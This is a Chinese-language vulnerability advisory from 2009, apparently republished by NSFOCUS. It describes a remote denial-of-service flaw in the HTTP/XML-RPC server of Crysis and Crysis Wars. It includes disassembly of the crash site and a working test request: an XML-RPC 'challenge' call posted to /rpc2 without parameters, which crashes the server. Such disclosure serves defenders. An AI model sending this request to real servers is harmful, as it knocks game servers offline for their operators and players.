安全研究

安全漏洞
Crysis HTTP/XML-RPC服务远程拒绝服务漏洞

发布日期:2009-07-20
更新日期:2009-07-21

受影响系统:
Electronic Arts Crysis <= 1.21
Electronic Arts Crysis Wars <= 1.5
描述:
BUGTRAQ  ID: 35735

Crysis是由Crytek开发的第一人称射击游戏。

Crysis内置的HTTP/XML-RPC服务器没有正确地验证用户所提交的请求,如果远程攻击者提交了缺少参数的恶意请求的话,就会导致XML RPC命令的处理代码试图使用未初始化的指针:

    MOV EAX,DWORD PTR DS:[ECX]
    MOV EDX,DWORD PTR DS:[EAX+14]   ; access violation
    PUSH cryactio.3075F2A0          ; ASCII "params"
    CALL EDX

这会导致服务器立即崩溃。

<*来源:Luigi Auriemma (aluigi@pivx.com
  
  链接:http://secunia.com/advisories/35814/
        http://aluigi.altervista.org/adv/crysisviol-adv.txt?esohkb
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /rpc2 HTTP/1.1
Content-Length: 90

&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;methodCall&gt;
  &lt;methodName&gt;challenge&lt;/methodName&gt;
&lt;/methodCall&gt;

建议:
厂商补丁:

Electronic Arts
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ea.com

浏览次数:17740
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障